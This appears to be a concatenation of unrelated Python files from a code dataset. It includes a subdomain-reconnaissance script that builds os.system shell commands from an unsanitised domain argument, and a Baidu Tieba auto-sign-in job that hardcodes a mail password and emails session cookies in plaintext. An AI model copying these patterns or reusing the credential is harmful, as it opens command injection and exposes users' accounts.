category_urls = ['https://www.mannington.com/Residential/Adura-Vinyl-Plank/AduraMaxApex/Search',
'https://www.mannington.com/Residential/Adura-Vinyl-Plank/AduraMax/Search',
'https://www.mannington.com/Residential/Adura-Vinyl-Plank/AduraRigid/Search',
'https://www.mannington.com/Residential/Adura-Vinyl-Plank/AduraFlex/Search',
'https://www.mannington.com/Residential/Hardwood/Search',
'https://www.mannington.com/Residential/Laminate/Search',
'https://www.mannington.com/Residential/VinylSheet/LuxuryVinylSheet/Search',
'https://www.mannington.com/Residential/VinylSheet/Resilient/Search'
]
for cUrl in category_urls:
yield scrapy.Request(cUrl, callback=self.parse_products)
def parse_products(self, response):
all_products=response.xpath("//div[@class='product-thumbs']/div")
for product in all_products:
handle = product.xpath(".//a/@href").extract_first().split('/')[-1]
title = product.xpath(".//span[1]/text()").extract_first() + " " + product.xpath(".//span[2]/text()").extract_first() + " " + product.xpath(".//span[2]/text()").extract_first()
formattedcode = handle
product = WoodsItem()
product['title']= title
product['handle']= handle
product['formattedcode'] = 'mannington' + '-' + formattedcode
product['vendor']= 'mannington'
yield product
|
990,963 | 1a9067bc15662bdfec6ec716a5c488ee242ea67b | #!/usr/bin/python
import os, sys, MySQLdb, time
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../../")
import credentials
try:
domain = sys.argv[1].strip()
scanId = sys.argv[2]
if not os.path.exists("/tmp/ICU"):
os.makedirs("/tmp/ICU")
if not os.path.exists("/tmp/ICU/"+domain+"/"):
os.makedirs("/tmp/ICU/"+domain+"/")
#Add new subdomain scanners here. Make sure to let them save the output to /tmp/ICU/{domain}/doains-all.txt
os.system(os.path.dirname(os.path.abspath(__file__)) + "/../../tools/dependencies/sublister/sublist3r.py -o /tmp/ICU/"+domain+"/domains-all.txt -d "+domain)
time.sleep(2)
try:
#Subfinder
os.system("subfinder -d " + domain + " -v -o /tmp/ICU/"+domain+"/domains-subfinder.txt --timeout 6")
time.sleep(2)
#Amass
os.system("amass -o /tmp/ICU/"+domain+"/domains-amass.txt -d " + domain)
time.sleep(2)
except Exception as e:
print "An error occured; You probably dont have either subfinder or amass installed. Check the README.md to see you how to install them. Error: "
print str(e)
connection = MySQLdb.connect (host = credentials.database_server, user = credentials.database_username, passwd = credentials.database_password, db = credentials.database_name)
cursor = connection.cursor()
#Retrieve all info from a top domain and its subdomains, so we can use this data instead of opening new db connections later on
cursor.execute("select Domain, TopDomainID, Active, Program, DomainID, scan_Id from domains where TopDomainID = (select DomainID from domains where Domain = %s) or Domain = %s", (domain, domain))
database_data = cursor.fetchall()
database_domains = [d[0] for d in database_data]
non_active_subdomains = [x[0] for x in database_data if ord(x[2]) == False]
program = [x[3] for x in database_data if x[0] == domain][0]
topDomainID = [x[4] for x in database_data if x[0] == domain][0]
#All the domains from the subdomain scanners
domains_all = open("/tmp/ICU/"+domain+"/domains-all.txt",'r').read().split('\n')
try:
#Domains from subfinder
domains_subfinder = open("/tmp/ICU/"+domain+"/domains-subfinder.txt",'r').read().split('\n')
#Domains from amass
domains_amass = open("/tmp/ICU/"+domain+"/domains-amass.txt",'r').read().split('\n')
#Add the subfinder domains
domains_all.extend(x for x in domains_subfinder if x not in domains_all)
#unique
domains_all = list(set(domains_all))
#Add the amass domains
domains_all.extend(x for x in domains_amass if x not in domains_all)
#unique
domains_all = list(set(domains_all))
except Exception as e:
print "An error occured; You probably dont have either subfinder or amass installed. Check the README.md to see you how to install them. Error: "
print str(e)
#Add all the database subdomain to it
domains_all.extend(x for x in database_domains if x not in domains_all)
#unique -- Unique each time after adding a new list, to limit ram usage
domains_all = list(set(domains_all))
#Put all the online domains in a domains-online.txt
os.system(os.path.dirname(os.path.abspath(__file__)) + "/../../tools/online.py /tmp/ICU/"+domain+"/domains-all.txt /tmp/ICU/"+domain+"/domains-online.txt")
#Convert online domains to array
domains_online = open("/tmp/ICU/"+domain+"/domains-online.txt",'r').read().split('\n')
#Loop through every subdomain
for sub_domain in domains_all:
#Get the scanID to insert. If the domains was already in the db and isnt changed, then keep the old scanID. otherwise use the scanID of the current scan
insertScanId = scanId if not [x[5] for x in database_data if x[0] == sub_domain] else [x[5] for x in database_data if x[0] == sub_domain][0]
#If the subdomain is online
if sub_domain in domains_online:
active=True
#If the subdomain used to be offline, give it the current scanID
if sub_domain in non_active_subdomains:
insertScanId = scanId
else:
active=False
if sub_domain:
#Insert the new values, or update them if they already existed
cursor.execute("INSERT INTO domains (Program, TopDomainID, Active, InScope, Domain, scan_Id) VALUES (%s, %s, %s, %s, %s, %s) ON DUPLICATE KEY UPDATE Active = %s, LastModified = now(), scan_Id = %s", (program, topDomainID, active, 1, sub_domain, insertScanId, active, insertScanId))
connection.commit()
cursor.close ()
connection.close ()
except Exception as e:
#Handle the errors, and save them to the database
print "error in domains_db.py with main domain; " + domain
cursor.execute("INSERT INTO errors (Domain, ErrorDescription, Error, Script, scan_Id) VALUES (%s, %s, %s, %s, %s) ", (domain, "error in domains_db.py with main domain; "+domain, e, "sublister_to_db.py", scanId))
connection.commit()
cursor.close()
connection.close()
print e
sys.exit()
|
990,964 | b1670868f5a33460a203d07135cfabe1c91622da | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
import json
class MlbScrapeItem(scrapy.Item):
# define the fields for your item here like:
#name = scrapy.Field()
def __init__(self, raw):
jobj = json.loads(raw)
for key in jobj:
setattr(self, key, jobj[key])
|
990,965 | c8920f368cbdebc5f2a1318d5ab6f2b1dc8edbe3 | import psutil
from plyer import notification
import time
battery = psutil.sensors_battery()
while True:
percent = battery.percent
notification.notify(
title = "Battery Percentage",
messege = str(percent) + "% Battery remaining",
timeout = 10
)
time.sleep(60*60)
continue |
990,966 | fe8efa2c4da43d57bad02c9d739e25be4f4e49b8 | T=int(input())
for t in range(T):
V,E=map(int,input().split())
total_map=[[0]*(V+1) for i in range(V+1)]
for e in range(E):
y,x=map(int,input().split())
total_map[y][x]=1
total_map[x][y]=1
start,end=map(int,input().split())
queue=[]
vistied=[0]*(V+1)
distance=[-1]*(V+1)
queue.append(start)
vistied[start]=1
distance[start]=0
result=[1]
while queue!=[]:
start=queue.pop(0)
for next in range(len(total_map[start])):
if total_map[start][next]==1 and vistied[next]==0:
queue.append(next)
vistied[next] = 1
distance[next]=distance[start]+1
if distance[end]==-1:
distance[end]==0
print(f'#{t+1} {distance[end]}')
|
990,967 | 024d94925c6c19fb676bfb31d1dbb7ba2d8edd98 | import socket
import time
import json
# Set variables to connect
HOST = 'irc.twitch.tv'
PORT = 6667
NICK = 'ENTER NICK HERE'
PASS = 'ENTER PASS HERE'
# Connect to specific channel
CHANNEL = input('What channel are you connecting to? ')
s = socket.socket()
s.connect((HOST, PORT))
s.send(str.encode('PASS ' + PASS + '\r\n'))
s.send(str.encode('NICK ' + NICK + '\r\n'))
s.send(str.encode('JOIN #' + CHANNEL + '\r\n'))
# Remove fluff from start of chat
while True:
line = str(s.recv(1024))
if 'End of /NAMES list' in line:
break
# Initialize counter and timer
pog_counter = []
lul_counter = []
kappa_counter = []
sleep_counter = []
cry_counter = []
wut_counter = []
pog_count = 0
lul_count = 0
kappa_count = 0
sleep_count = 0
cry_count = 0
wut_count = 0
start = time.time()
t = 0
minutes = int(input('How many minutes? '))
# Main loop
while True:
for line in str(s.recv(1024)).split('\\r\\n'):
if 'PING' in line:
s.send(bytes('PONG :tmi.twitch.tv\r\n', 'UTF-8'))
parts = line.split(':')
if len(parts) < 3:
continue
if 'QUIT' not in parts[1] and 'JOIN' not in parts[1] and 'PART' not in parts[1]:
message = parts[2][:len(parts[2])]
username = parts[1].split('!')[0]
#print(username, ': ', message)
if 'PogChamp' in message:
pog_count += 1
if 'LUL' in message:
lul_count += 1
if 'Kappa' in message:
kappa_count += 1
if 'ResidentSleeper' in message:
sleep_count += 1
if 'BibleThump' in message:
cry_count += 1
if 'WutFace' in message:
wut_count = 0
elapsed = time.time() - start
# Reset counters every minute
if (elapsed >= 60):
pog_counter.append(pog_count)
lul_counter.append(lul_count)
kappa_counter.append(kappa_count)
sleep_counter.append(sleep_count)
cry_counter.append(cry_count)
wut_counter.append(wut_count)
pog_count = 0
lul_count = 0
kappa_count = 0
sleep_count = 0
cry_count = 0
wut_count = 0
print(pog_counter)
t = t + 1
start = time.time()
elapsed = 0
# After n minutes write and stop program
if t >= minutes:
l = [pog_counter, lul_counter, kappa_counter, sleep_counter, cry_counter, wut_counter]
with open('data.json', 'w') as f:
json.dump(l, f)
break
|
990,968 | 7c68a8488f068db99dc572bfdbfea77627bc4abc | # -*- coding: utf-8 -*-
# @Time : 2019-03-22- 0022 17:34
# @Author : Andy
# @Email : 498330580@qq.com
# @File : tieba_time_task.py
# @Software: PyCharm
import os, sys
import random
import re
import time
import django
import requests as req
# 启用邮箱
import smtplib
from email.mime.text import MIMEText
from email.utils import formataddr
# 当前脚本目录
# BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# 设置当前工作目录为脚本目录
# os.chdir('/www/wwwroot/python/yaoling')
# print('当前脚本目录',BASE_DIR,'当前工作目录',os.getcwd())
# 将django项目根目录加入环境变量
parent_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(parent_path)
# 在默认的环境中运行(第一个参数是Django运行的配置文件,第二个参数是当前项目运行的配置文件)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "yaoling.settings")
# 运行Django项目
django.setup()
from tieba import models
from django.utils import timezone
def email_python(name, receivers, bduss, day):
# 发送邮件
try:
my_sender = 'yaolingzhijia@163.com' # 发件人邮箱账号,为了后面易于维护,所以写成了变量
my_user = receivers # 收件人邮箱账号,为了后面易于维护,所以写成了变量
body = '''
<h2>当前为第{day}天提醒</h2>
<p>账号:{name}-BDUSS失效,请速至瑶玲之家签到中心修改,如超过7日未修改,该百度账号将会被删除</p>
<p style=word-wrap:break-word>该BDUSS为:{bduss}</p>
<p><a href="http://www.yaoling.ltd">瑶玲之家</a></p>
'''.format(name=name, bduss=bduss, day=day)
msg = MIMEText(body, 'html', 'utf-8')
msg['From'] = formataddr(["瑶玲之家", my_sender]) # 括号里的对应发件人邮箱昵称、发件人邮箱账号
msg['To'] = formataddr([name, my_user]) # 括号里的对应收件人邮箱昵称、收件人邮箱账号
msg['Subject'] = "账号{name}-BDUSS失效".format(name=name) # 邮件的主题,也可以说是标题
server = smtplib.SMTP("smtp.163.com", 25) # 发件人邮箱中的SMTP服务器,端口是25
server.login(my_sender, "19920124Zhy") # 括号中对应的是发件人邮箱账号、邮箱密码
server.sendmail(my_sender, [my_user, ], msg.as_string()) # 括号中对应的是发件人邮箱账号、收件人邮箱账号、发送邮件
server.quit() # 这句是关闭连接的意思
print("{name}邮件发送成功".format(name=name))
except smtplib.SMTPException:
print("Error: {name}无法发送邮件".format(name=name))
class Tieba:
def __init__(self, bduss):
self.wenku = req.Session()
self.zhidao = req.Session()
self.tieba_qiandao = req.Session()
self.tieba = req.Session()
self.wenku.headers.update({
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'keep-alive',
'Cookie': 'BDUSS=' + bduss,
'Host': 'wenku.baidu.com',
'Referer': 'https://wenku.baidu.com/task/browse/daily',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/66.0.3359.181 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest'
})
self.zhidao.headers.update({
'Accept': 'application/json',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'keep-alive',
'Content-Length': '11',
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'BDUSS=' + bduss,
'Host': 'zhidao.baidu.com',
'Origin': 'https://zhidao.baidu.com',
'Referer': 'https://zhidao.baidu.com/mmisc/signinfo?uid=C1954D0D376337B302790226BF0B702F&step=2',
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, '
'like Gecko) Version/9.0 Mobile/13B143 Safari/601.1',
'X-ik-ssl': '1',
'X-Requested-With': 'XMLHttpRequest',
})
self.tieba_qiandao.headers.update({
'Host': 'tieba.baidu.com',
'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, '
'like Gecko) Chrome/72.0.3626.109 Mobile Safari/537.36 ',
'Cookie': 'BDUSS=' + bduss,
})
self.tieba.cookies.update({'BDUSS': bduss})
self.tieba.headers.update({
'Host': 'tieba.baidu.com',
'User-Agent':
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/39.0.2171.71 Safari/537.36',
})
def baidu_wenku(self, time_sleep=True):
# 百度文库签到
if time_sleep:
time.sleep(random.randint(1, 5)) # 随机间隔签到时间
url = 'https://wenku.baidu.com/task/submit/signin'
self.wenku.get(url)
return '签到成功'
def baidu_zhidao(self, time_sleep=True):
# 百度知道签到
if time_sleep:
time.sleep(random.randint(1, 5)) # 随机间隔签到时间
url = 'https://zhidao.baidu.com/msubmit/signin?random=0.3507959078709957&'
payload = {"ssid": "", "cifr": ""}
if self.zhidao.post(url, data=payload).json()['errmsg'] != '已签到':
errmsg = '签到成功'
else:
errmsg = '已签到'
return errmsg
def tieba_login_error(self):
# 检查bduss是否失效
if self.tieba.get('http://tieba.baidu.com/dc/common/tbs').json()['is_login']:
return True
else:
return False
def bduss_id(self):
# 获取贴吧用户中心网页拼接ID,并合成用户中心地址
try:
r = self.tieba_qiandao.get('http://tieba.baidu.com/f/user/json_userinfo').json()['data']['user_portrait']
tieba_yonghu_url = 'http://tieba.baidu.com/home/main?id=' + r
return tieba_yonghu_url
except Exception as e:
print('获取贴吧用户中心网页拼接ID error', e)
return 'https://tieba.baidu.com/index.html'
def get_name(self):
# 网页版获取贴吧用户名
try:
r = self.tieba.get('https://tieba.baidu.com/mo/q-').text
name_re = re.search(r">([\u4e00-\u9fa5a-zA-Z0-9]+)的i贴吧<", r)
if name_re:
name = re.search(r">([\u4e00-\u9fa5a-zA-Z0-9]+)的i贴吧<", r).group(1)
else:
name = 'BDUSS无效'
except Exception as e:
print('网页版获取贴吧用户名error:', e)
name = 'BDUSS无效'
return name
# 获取账号的关注贴吧列表
def tieba_me_list(self):
try:
tieba_list = []
html_list = self.tieba.get('http://tieba.baidu.com/mo/q/newmoindex').json()
for i in html_list['data']['like_forum']:
tieba_list.append({'ID': i['forum_id'],
'名字': i['forum_name'],
'是否签到': '是' if i['is_sign'] == 1 else '否',
'经验': i['user_exp'],
'等级': i['user_level'],
'是否关注': '是' if i['is_like'] else '否'})
return tieba_list
except Exception as e:
print('获取账号的关注贴吧列表error:', e)
# 签到贴吧,并返回是否签到成功
def tieba_clock(self, name, forum_id, time_sleep=True):
try:
if time_sleep:
time.sleep(random.randint(1, 5)) # 随机间隔签到时间
t = re.search('"tbs":"(.*?)"', self.tieba_qiandao.get('https://tieba.baidu.com/f?kw=%s&pn=0&' % name).text)
if t:
tbs = t.group(1)
is_like = 1
qiandao = self.tieba.get('https://tieba.baidu.com/mo/q/sign?tbs=%s&kw=%s&is_like=%d&fid=%d' % (tbs,
name,
is_like,
int(forum_id)))
time.sleep(2)
if qiandao.json()['data']['msg'] != '亲,你之前已经签过了':
# 顺利签到的情况
return True
else:
# 无法签到的贴吧
return False
except Exception as e:
print('签到贴吧error', e)
return False
class Task:
@staticmethod
def bduss_error():
# 定时检测数据库中BDUSS是否有效
print('开始检查BDUSS有效性')
bduss_list = models.Bduss.objects.all()
for bduss in bduss_list:
name = Tieba(bduss.bduss).get_name()
bduss = models.Bduss.objects.filter(bduss=bduss.bduss)
bduss.update(username=name)
print('BDUSS有效性检查结束')
@staticmethod
def bduss_delete():
# 定时删除数据库中失效的BDUSS
print('开始删除失效的BDUSS')
time_now = timezone.now()
username_off = models.Bduss.objects.filter(username='BDUSS无效')
if username_off:
for username in username_off:
if models.Bduss_time.objects.filter(username=username):
bduss_time = models.Bduss_time.objects.get(username=username)
if bduss_time.email_send.strftime("%Y-%m-%d") != time_now.strftime("%Y-%m-%d"):
day_int = (time_now-bduss_time.username_false).days + 1
if day_int >= 8:
username.delete()
else:
bduss_time.email_send = time_now
email_python(name=username.usernames,
receivers=username.user.email,
bduss=username.bduss,
day=str(day_int))
bduss_time.save()
else:
print('{name}当天已发送提醒邮件'.format(name=username.usernames))
else:
bduss_time = models.Bduss_time(username=username)
bduss_time.save()
email_python(name=username.usernames,
receivers=username.user.email,
bduss=username.bduss,
day='1')
# models.Bduss.objects.filter(username='BDUSS无效').delete()
print('删除失效的BDUSS完毕')
@staticmethod
def tieba_me_list_update():
# 定时更新个人贴吧列表数据
try:
print('开始更新贴吧信息')
bduss_list = models.Bduss.objects.exclude(username='BDUSS无效')
tieba_me_list = []
if bduss_list:
for bduss in bduss_list:
tieba_list_get = [str(f_id['ID']) for f_id in Tieba(bduss.bduss).tieba_me_list()]
for tieba_me in Tieba(bduss.bduss).tieba_me_list():
if models.TiebaMeList.objects.filter(username=bduss, forum_id=tieba_me['ID']):
models.TiebaMeList.objects.filter(username=bduss, forum_id=tieba_me['ID']).update(
is_sign=True if tieba_me['是否签到'] == '是' else False,
user_exp=tieba_me['经验'],
user_level=tieba_me['等级']
)
else:
tieba_me_list.append(models.TiebaMeList(username=bduss,
forum_name=tieba_me['名字'],
forum_id=tieba_me['ID'],
is_sign=True if tieba_me['是否签到'] == '是' else False,
user_exp=tieba_me['经验'],
user_level=tieba_me['等级']))
for tiebalist_list in models.TiebaMeList.objects.filter(username__bduss=bduss.bduss):
if tiebalist_list.forum_id not in tieba_list_get:
models.TiebaMeList.objects.filter(forum_id=tiebalist_list.forum_id).delete()
print(tiebalist_list, '删除成功')
if tieba_me_list:
models.TiebaMeList.objects.bulk_create(tieba_me_list)
print('更新贴吧信息结束')
except Exception as e:
print('定时更新个人贴吧列表数据ERROR:', e)
@staticmethod
def tieba_timing_task():
# 定时签到
try:
print('开始定时签到贴吧')
for tieba_me_list in models.TiebaMeList.objects.all():
time_now = timezone.now()
t_year = int(time_now.strftime("%Y"))
t_month = int(time_now.strftime("%m"))
t_day = int(time_now.strftime("%d"))
time_list = models.SignTime.objects.filter(name=tieba_me_list,
time__day=t_day,
time__month=t_month,
time__year=t_year
)
if tieba_me_list.is_sign:
# 判断本已签到贴吧是否添加签到时间,未添加就添加签到时间
tieba_me_list.note = ''
tieba_me_list.save()
if not time_list:
s = models.SignTime(name=tieba_me_list)
s.save()
else:
tieba = Tieba(tieba_me_list.username.bduss).tieba_clock(name=tieba_me_list.forum_name,
forum_id=tieba_me_list.forum_id)
if tieba:
# 顺利签到的情况
s = models.SignTime(name=tieba_me_list)
s.save()
tieba_me_list.is_sign = True
tieba_me_list.note = ''
tieba_me_list.save()
else:
# 无法签到的贴吧
if not time_list:
s = models.SignTime(name=tieba_me_list)
s.save()
tieba_me_list.note = '该贴吧无法签到,请检查贴吧设置。'
tieba_me_list.save()
print('定时签到贴吧结束')
except Exception as e:
print('定时签到error:', e)
@staticmethod
def baidu_wenku_sign():
# 定时签到文库
try:
print('开始定时签到文库')
bduss_list = models.Bduss.objects.exclude(username='BDUSS无效').filter(user__signconfig__baidu_wenku=True)
for bduss in bduss_list:
Tieba(bduss.bduss).baidu_wenku()
print('定时签到文库结束')
except Exception as e:
print('定时签到文库ERROR', e)
@staticmethod
def baidu_zhidao_sign():
# 定时签到知道
try:
print('开始定时签到知道')
bduss_list = models.Bduss.objects.exclude(username='BDUSS无效').filter(user__signconfig__baidu_zhidao=True)
for bduss in bduss_list:
Tieba(bduss.bduss).baidu_zhidao()
print('定时签到知道结束')
except Exception as e:
print('定时签到知道ERROR', e)
def run():
Task.bduss_error()
Task.bduss_delete()
Task.tieba_me_list_update()
Task.tieba_timing_task()
Task.baidu_wenku_sign()
Task.baidu_zhidao_sign()
if __name__ == '__main__':
# Task.bduss_error()
# Task.bduss_delete()
# Task.tieba_me_list_update()
# Task.tieba_timing_task()
# Task.baidu_wenku_sign()
# Task.baidu_zhidao_sign()
run()
|
990,969 | 60d0d7d69631811f2cd8de78ec57476b0f611b69 | # -*- coding: utf-8 -*-
import crom
import dawnlight
from urllib.parse import unquote
from cromlech.browser import IRequest, IResponse
from cromlech.browser import IPublisher, IView, IResponseFactory
from zope.location import ILocation, LocationProxy, locate
from .lookup import ModelLookup, ViewLookup
from .utils import safeguard
shortcuts = {
'@@': dawnlight.VIEW,
}
base_model_lookup = ModelLookup()
base_view_lookup = ViewLookup()
class PublicationError(Exception):
pass
@crom.implements(IPublisher)
class DawnlightPublisher(object):
"""A publisher using model and view lookup components.
"""
def __init__(self,
model_lookup=base_model_lookup,
view_lookup=base_view_lookup):
self.model_lookup = model_lookup
self.view_lookup = view_lookup
def base_path(self, request):
path = unquote(request.path)
script_name = request.script_name
if path.startswith(script_name):
return path[len(script_name):]
return path
@safeguard
def publish(self, request, root, handle_errors):
path = self.base_path(request)
stack = dawnlight.parse_path(path, shortcuts)
model, crumbs = self.model_lookup(request, root, stack)
if IResponse.providedBy(model):
# The found object can be returned safely.
return model
if IResponseFactory.providedBy(model):
return model()
# The model needs an renderer
component = self.view_lookup(request, model, crumbs)
if component is None:
raise PublicationError('%r can not be rendered.' % model)
# This renderer needs to be resolved into an IResponse
if not IResponse.providedBy(component):
factory = IResponseFactory(component)
return factory()
return component
@crom.adapter
@crom.sources(IRequest, Exception)
@crom.target(IResponseFactory)
def exception_view(request, exception):
view = IView(exception, request)
if view is not None:
# Make sure it's properly located.
if not ILocation.providedBy(view):
view = LocationProxy(view)
locate(view, parent=exception, name='exception')
return IResponseFactory(view)
return None
|
990,970 | 218d17f27a4854f037858985c013634188fa9c52 | class Solution:
def countDiff(self, nums, k):
table = {}
copy = set()
res = 0
for num in nums:
if num not in copy or k == 0:
if num in table:
res += table[num]
table[num] = -1
if k != 0:
table[num - k] = table.get(num - k, 0) + 1
table[num + k] = table.get(num + k, 0) + 1
else:
table[num] = table.get(num, 0) + 1
copy.add(num)
return res
if __name__ == '__main__':
x = Solution()
n = int(input())
while n > 0:
n -= 1
input()
nums = [int(i) for i in input().split()]
k = int(input())
print(x.countDiff(nums, k))
|
990,971 | 19623492726052910386c5b35116f27cb7412869 | ''' --- Commented Out ---
#Visualize boundaries of 3D Grid
def makeMaterial(name, diffuse, specular, alpha):
mat = bpy.data.materials.new(name)
mat.diffuse_color = diffuse
mat.diffuse_shader = 'LAMBERT'
mat.diffuse_intensity = 1.0
return mat
def setMaterial(ob, mat):
me = ob.data
me.materials.append(mat)
#Visualizing axis aligned bounding box
size = 0.05
for i in range(8):
x = None;
y = None;
z = None;
if i >3:
z = zMax
else:
z = zMin
if i % 2 == 0:
y = yMin
else:
y = yMax
red = makeMaterial('Red',(1,0,0),(1,1,1),1)
origin = (xMax,y,z)
bpy.ops.mesh.primitive_uv_sphere_add(location=origin)
bpy.ops.transform.resize(value=(size, size, size))
setMaterial(bpy.context.object, red)
origin = (xMin,y,z)
bpy.ops.mesh.primitive_uv_sphere_add(location=origin)
bpy.ops.transform.resize(value=(size, size, size))
setMaterial(bpy.context.object, red)
''' |
990,972 | 0cb2287f5198344ff441a48cd9a2ecfaacd370a8 | import collections
import copy
import gym
import itertools
import numpy as np
import spinup.algos.pytorch.sac.core as core
import time
import torch
import torch.nn as nn
from spinup.utils.logx import EpochLogger
class ReplayBuffer:
"""
A simple FIFO experience replay buffer for DDPG agents.
"""
def __init__(self, obs_dim, act_dim, size):
self.obs_buf = np.zeros(core.combined_shape(size, obs_dim), dtype=np.float32)
self.obs2_buf = np.zeros(core.combined_shape(size, obs_dim), dtype=np.float32)
self.act_buf = np.zeros(core.combined_shape(size, act_dim), dtype=np.float32)
self.rew_buf = np.zeros(size, dtype=np.float32)
self.done_buf = np.zeros(size, dtype=np.float32)
self.ptr, self.size, self.max_size = 0, 0, size
def store(self, obs, act, rew, next_obs, done):
self.obs_buf[self.ptr] = obs
self.obs2_buf[self.ptr] = next_obs
self.act_buf[self.ptr] = act
self.rew_buf[self.ptr] = rew
self.done_buf[self.ptr] = done
self.ptr = (self.ptr+1) % self.max_size
self.size = min(self.size+1, self.max_size)
def sample_batch(self, batch_size=32):
idxs = np.random.randint(0, self.size, size=batch_size)
tup = (self.obs_buf[idxs],
self.act_buf[idxs],
self.rew_buf[idxs],
self.obs2_buf[idxs],
self.done_buf[idxs])
return (torch.as_tensor(arr) for arr in tup)
def mlp(sizes, activation=nn.ReLU, output_activation=nn.Identity):
layers = []
for i in range(len(sizes) - 1):
act = output_activation if i == len(sizes) - 2 else activation
layers += [nn.Linear(sizes[i], sizes[i+1]), act()]
return nn.Sequential(*layers)
class SquashedGaussianMLPActor(nn.Module):
def __init__(self, obs_dim, act_dim, hidden_sizes, act_limit, activation=nn.ReLU):
super().__init__()
self.net = mlp([obs_dim] + list(hidden_sizes), activation, activation)
self.mu_layer = nn.Linear(hidden_sizes[-1], act_dim)
self.log_std_layer = nn.Linear(hidden_sizes[-1], act_dim)
self.act_limit = act_limit
def forward(self, obs, deterministic=False, with_logprob=True):
net_out = self.net(obs)
mu = self.mu_layer(net_out)
log_std = self.log_std_layer(net_out)
log_std = torch.clamp(log_std, core.LOG_STD_MIN, core.LOG_STD_MAX)
std = torch.exp(log_std)
# Pre-squash distribution and sample
pi_distribution = torch.distributions.Normal(mu, std)
if deterministic:
# Only used for evaluating policy at test time.
pi_action = mu
else:
pi_action = pi_distribution.rsample()
if with_logprob:
logp_pi = pi_distribution.log_prob(pi_action).sum(axis=-1) # TODO: Why sum(axis=-1)
logp_pi -= (2*(np.log(2) - pi_action - torch.nn.functional.softplus(-2*pi_action))).sum(axis=1)
else:
logp_pi = None
pi_action = torch.tanh(pi_action)
pi_action = self.act_limit * pi_action
return pi_action, logp_pi
class QNet(nn.Module):
def __init__(self, obs_dim, act_dim, hidden_sizes, activation=nn.ReLU):
super().__init__()
self.q_net = mlp(sizes = [obs_dim + act_dim] + hidden_sizes + [1], activation=activation)
def forward(self, obs, act):
cat_obs_act = torch.cat([obs, act], dim=-1)
return torch.squeeze(self.q_net(cat_obs_act), -1)
def my_sac(env_fn, seed=0, steps_per_epoch=4000, epochs=100, max_ep_len=1000,
hidden_sizes=[256,256],
logger_kwargs=dict(), save_freq=1,
batch_size=100, start_steps=10000,
update_after=1000, update_every=50, num_test_episodes=10,
gamma=0.99, polyak=0.995,
pi_lr=1e-3, q_lr=1e-3, buffer_size=int(1e6),
alpha=0.2):
"""
My SAC implementation
"""
# Set up logger and save configuration
logger = EpochLogger(**logger_kwargs)
logger.save_config(locals())
# Random seed
torch.manual_seed(seed)
np.random.seed(seed)
# Instantiate environment
env = env_fn()
test_env = env_fn()
obs_dim = env.observation_space.shape[0]
act_dim = env.action_space.shape[0]
print("env.observation_space", env.observation_space)
print("env.observation_space.shape", env.observation_space.shape)
print("env.action_space", env.action_space)
action_min = env.action_space.low[0]
action_max = env.action_space.high[0]
if isinstance(env.action_space, gym.spaces.Discrete):
print("Discrete action space not supported for my_sac!")
return
# Set up experience buffer
buf = ReplayBuffer(obs_dim, act_dim, buffer_size)
# Instantiate models
assert action_max == abs(action_min)
policy = SquashedGaussianMLPActor(obs_dim, act_dim, hidden_sizes, action_max)
policy_optimizer = torch.optim.Adam(policy.parameters(), lr=pi_lr)
# Two Q-functions for Double Q Learning
q_function_1 = QNet(obs_dim, act_dim, hidden_sizes)
q_function_target_1 = copy.deepcopy(q_function_1)
q_function_2 = QNet(obs_dim, act_dim, hidden_sizes)
q_function_target_2 = copy.deepcopy(q_function_2)
q_params = itertools.chain(q_function_1.q_net.parameters(), q_function_2.q_net.parameters())
q_optimizer = torch.optim.Adam(q_params, lr=q_lr)
# Set up model saving
logger.setup_pytorch_saver(policy)
# TODO: Save value network as well
# Freeze target networks with respect to optimizers (only update via polyak averaging)
for q_targ in q_function_target_1.parameters():
q_targ.requires_grad = False
for q_targ in q_function_target_2.parameters():
q_targ.requires_grad = False
# Prepare for interaction with environment
num_steps = epochs * steps_per_epoch
start_time = time.time()
o, ep_ret, ep_len = env.reset(), 0, 0
# Main loop: collect experience in env and update/log each epoch
for step in range(num_steps):
with torch.no_grad():
# Until start_steps have elapsed, randomly sample actions
# from a uniform distribution for better exploration. Afterwards,
# use the learned policy.
if step < start_steps:
a = env.action_space.sample()
else:
assert o.shape == (obs_dim,)
a, _ = policy(torch.tensor(o, dtype=torch.float32).unsqueeze(0), with_logprob=False)
assert a.shape == (1, act_dim)
a = a[0] # Remove batch dimension
a = a.numpy() # Convert to numpy
next_o, r, d, _ = env.step(a)
ep_ret += r
ep_len += 1
# Ignore the "done" signal if it comes from hitting the time
# horizon (that is, when it's an artificial terminal signal
# that isn't based on the agent's state)
d = False if ep_len==max_ep_len else d
buf.store(o, a, r, next_o, d)
# Update obs (critical!)
o = next_o
# Trajectory finished
if d or (ep_len == max_ep_len):
logger.store(EpRet=ep_ret, EpLen=ep_len)
o, ep_ret, ep_len = env.reset(), 0, 0
if step >= update_after and step % update_every == 0:
for j in range(update_every):
def update():
o, a, r, next_o, d = buf.sample_batch(batch_size)
# Compute targets
with torch.no_grad():
next_a, logp = policy(next_o)
assert next_a.shape == (batch_size, act_dim)
# Entropy term
ent = - alpha * logp
# Clipped Double Q-Learning
next_q_targ_1 = q_function_target_1(next_o, next_a)
next_q_targ_2 = q_function_target_2(next_o, next_a)
next_q_targ = torch.min(next_q_targ_1, next_q_targ_2)
q_targ = r + gamma * (1 - d) * (next_q_targ + ent)
# Update Q functions
